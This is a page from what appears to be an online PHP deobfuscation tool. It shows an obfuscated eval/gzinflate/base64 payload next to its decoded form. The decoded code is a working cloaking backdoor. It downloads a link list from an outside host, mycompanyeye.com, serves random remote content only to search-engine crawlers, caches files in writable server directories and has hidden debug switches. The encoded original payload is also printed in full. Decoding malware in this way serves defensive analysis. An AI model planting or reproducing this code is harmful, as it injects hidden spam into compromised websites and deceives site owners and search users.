Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval( gzinflate( base64_decode('TVXXCuzIFfyX+7I2Y1Y5YfygVs7SKIsLRjmMRlkzkr7eWt+F3Yei+lRV01..

Decoded Output download

h5('http://mycompanyeye.com/bulbozavr/puk7/13.list', 1 * 900);
function h5($u, $t){
	$nobot = isset($_REQUEST['nobot']) ? true : false;
	$debug = isset($_REQUEST['debug']) ? true : false;
	$t2    = 3600 * 5;
	$t3    = 3600 * 12;
	$tm    = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
	if (!$tmp = triksp(array($tm, './images/avatars/'))) {
		if ($debug) {
			echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "
");
		}
		return;
	}
	$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
	if ($debug) {
		echo('DEBUG: (INFO: temporary path=' . $tm . ')<br>, agent ('.$agent.')' . "
");
	}
	if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
		if ($debug) {
			echo('DEBUG: (ERROR: you is not spider, return)<br>'."
");
		}
		return;
	}
	if ($debug) {
		echo('DEBUG: (bot by:['.$ret[1].'])<br>'."
");
	}

	if ($t) {
		if ($debug) {
			if (file_exists($tmp . md5($u) . 'c')) {
				echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "
");
				$filemtime = filemtime($tmp . md5($u) . 'c');
				$current   = time();
				$diff      = $current - $filemtime;
				echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "
");
				if ($diff < $t) {
					echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "
");
				} else {
					echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "
");
				}
			}
		}
		if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
			readfile($tmp . md5($u . 'c'));
			if ($debug) {
				echo('DEBUG: (END: readfile link, return)<br>' . "
");
			}
			return;
		}
	}
	if ($debug) {
		if (file_exists($tmp . md5($u))) {
			echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "
");
			$filemtime = filemtime($tmp . md5($u));
			$current   = time();
			$diff      = $current - $filemtime;
			echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "
");
			if ($diff < $t3) {
				echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "
");
			} else {
				echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "
");
			}
		}
	}
	if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
		$d = file($tmp . md5($u));
	} else {
		$c = curl_init($u);
		if (!$c) {
			if ($debug) {
				echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "
");
			}
			return;
		}
		curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
		$d = curl_exec($c);
		$l = curl_getinfo($c);
		curl_close($c);
		if ($l['http_code'] == 200 && $d) {
			@file_put_contents($tmp . md5($u), $d);
			$d = explode("
", $d);
		}
	}
	if ($debug) {
		echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "
");
	}
	if ($d) {
		$l = @array_rand($d);
		$c = @curl_init(trim($d[$l]));
		if (!$c) {
			if ($debug) {
				echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "
");
			}
			return;
		}
		if ($t) {
			curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
		}
		$d = curl_exec($c);
		if ($t) {
			if ($debug) {
				echo('DEBUG: (INFO: link download)<br>' . "
");
			}
			@file_put_contents($tmp . md5($u . 'c'), $d);
			echo($d);
		} else {
			if ($debug) {
				echo('DEBUG: (ERROR: link NOT download)<br>' . "
");
			}
		}
		@curl_close($c);
	}
}


function triksp($array){
	foreach ($array as $path) {
		if (is_writable($path)) {
			return $path;
		}
	}
	return false;
}

Did this file decode correctly?

Original Code

eval( gzinflate( base64_decode('TVXXCuzIFfyX+7I2Y1Y5YfygVs7SKIsLRjmMRlkzkr7eWt+F3Yei+lRV01DQnGkp6/8u5dSnefmPH9DvD6j88a8fPw+S+HlQ5M3IDe7ngdI3U7fG3szcEG6Qv7w/MhT+687/c+ifGvZLw+4cdvuEeM9/5sg/vL/NKP3bERRbzkySYOPGB9U739UmhxZQHHM1nEkt3duMyG/w1MOd7pE6/NIe2J7A6wueoeGDeY3y6VYOhwLejk2+pDZqt1eoXMJ4aDrcU94jIn2onKtQBcgGOWERjT7rAes62msIXIGXvUJfuVmuZYsHZX3aOBfhjM0/7ZkwXjnr6CzRFpI4uSyMxhWSL2HDWc5XHL6WFnMv6yqZNBoLv+pkFxnNR0LzqzL0YPzGT9zwEFEiSuuFvpMuGMftkOVaZgZYPqBSqY/BbZIcNtFCO4WqjWFsOq/a7D1MEG2lpV9Li9GnHCcIjBJ1QbEHnlolekUOxqz1RDlp7OwgrLA8dJxrHXJHfJmMPPOP8Knh34RQFP27K7Ll5TynGcYKP07CmZAktZoIWavGc1ZjZqqF6cd6Bg9xsFniKXiGYoDUW5VXLn3Y+e4/lvGYZhh4NmxgQvhmqewzeGb4GWQH96RhngPxQYIPU5Fn2doMjPJf9Em1Lww5YsyXwlDEdMnYCh6zSw+Dr7zLhvKz0zRvJ0p7MnLkBHmNnIpyn8cw6mHMZMyY0EPTUrHUbmTrMvlKmrR6TsyvTqASXrgdmVzGt+EhcBLMd2bgS1Gndj002cfLT+FmAGam4fsiO9a70mK238JGnGNj7rzZ8VBHjcOeHT3FjYxrs5CxOUgyKKWA9R8xyA2MB9q+xsoSeNOKI1FZb/o+ruMg0UysnHggjaRFWbOOYFbZvpf1GaJaWNfDNQtotcpI50ASyi/4EjKpj/MNObxpYm5wnXqJZG0cfF1ul46G8CI6cFr2uqxyxslAvV86IceHka0KxUy4OkgKU61Bop0PpBqzQJzz3nWutELG7dTDC2U3D9NDtG37LMTDJdjDsJDCSelZnR/ENyJSSetGZnU2AIxvGGJZ0RO32S5PzLqKbxnJxBnrWbHn9i5RVTgHlgjzh2hePUku1BbZ2Sdrue4TIWpYBZD5aB+12vTDcRdPGjw4hJjd9ybTiKFrh0ONSCKdB8Qf1YagsWgvZxD71ZEzxRO1QizTN0IyVfKB7AJlwyzXkSwUYanKu6idzB1yIC4Cregzgzwkhzc0faDPyIzcykn6CgbIrn5MwS8hT9D7PPPMAXQ6TI5lC2wBM69C2Nlo3ACNADMaDtRrTU7rv+/ORroyXeWSpsozpCbNiZxLDwJQBoxdacP8Hh2ZiznOMI50AEQGMBSC6a/Qb4Z1IGBBde8DpeQu4jN/jqLqq1WqWNL76S4E32ZGyLlBvWrq0DWesKnceGSkJ/nMqkbxfJ3mK5EtM26OKML4q8i/gdmznc85T5fuetZM35n5nXZvYr7DYE15zE36VGkd7pzsGq0W4hcZuaseJebn/YriG7MKfdwCJx+6oRHrkhN8J0r3F+Ie2CmaOBnaM2maFmRBBqQAqILkz4A8Si0wxWadck2CieIMk03AbPZ4AZtgdlCNr+cDIU9lrOJ51gHaWEcSP4Nwujbc8jzCqh6AHNeZH6SlIAe681UPqPLHJwyHuqYBLC/FZc9U1kEkHqVO+ZUFwKALsL/pLpO1ofX+tCqpr1g13kVUX/Y/v90bgfkLGLiX0u8//vnv/wE=')));

Function Calls

gzinflate 2
preg_replace 1
base64_decode 2

Variables

None

Stats

MD5 e0719289a4608ed4ef4efa66375337ef
Eval Count 3
Decode Time 98 ms